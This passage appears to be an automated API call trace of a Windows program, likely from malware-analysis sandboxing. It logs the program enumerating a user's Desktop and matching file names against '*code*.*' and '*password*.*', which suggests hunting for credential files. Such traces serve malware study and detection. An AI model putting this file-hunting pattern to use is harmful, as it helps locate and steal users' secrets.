MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d80 [0110.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d80, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.954] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*code*.*") returned 0 [0110.954] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.954] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970dc0 [0110.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970dc0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.954] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*code*.*") returned 0 [0110.954] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.954] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d20 [0110.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d20, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.955] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*code*.*") returned 0 [0110.955] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.955] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea4d8 [0110.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x38ea4d8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", lpUsedDefaultChar=0x0) returned 49 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970e40 [0110.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970e40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.955] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*code*.*") returned 0 [0110.955] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.955] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", lpUsedDefaultChar=0x0) returned 45 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970da0 [0110.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970da0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.955] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*code*.*") returned 0 [0110.955] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.955] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea2d8 [0110.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x38ea2d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", lpUsedDefaultChar=0x0) returned 50 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c80 [0110.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c80, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.956] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*code*.*") returned 0 [0110.956] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.956] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea1d8 [0110.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x38ea1d8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", lpUsedDefaultChar=0x0) returned 54 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28a0 [0110.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970e00 [0110.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970e00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.956] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.956] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*code*.*") returned 0 [0110.956] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.956] FindClose (in: hFindFile=0x743920 | out: hFindFile=0x743920) returned 1 [0110.956] GetLastError () returned 0x12 [0110.956] SetLastError (dwErrCode=0x12) [0110.956] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2db0 [0110.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x29a2db0, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.957] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.957] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.957] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.957] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.957] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.957] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x3970678 [0110.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970678, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.957] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*password*.*") returned 0 [0110.957] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.957] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea198 [0110.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x38ea198, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.957] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0110.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x3970380 [0110.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970380, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.958] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*password*.*") returned 0 [0110.958] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.958] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea918 [0110.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x38ea918, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2858 [0110.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x3970420 [0110.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970420, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.958] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*password*.*") returned 0 [0110.958] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, 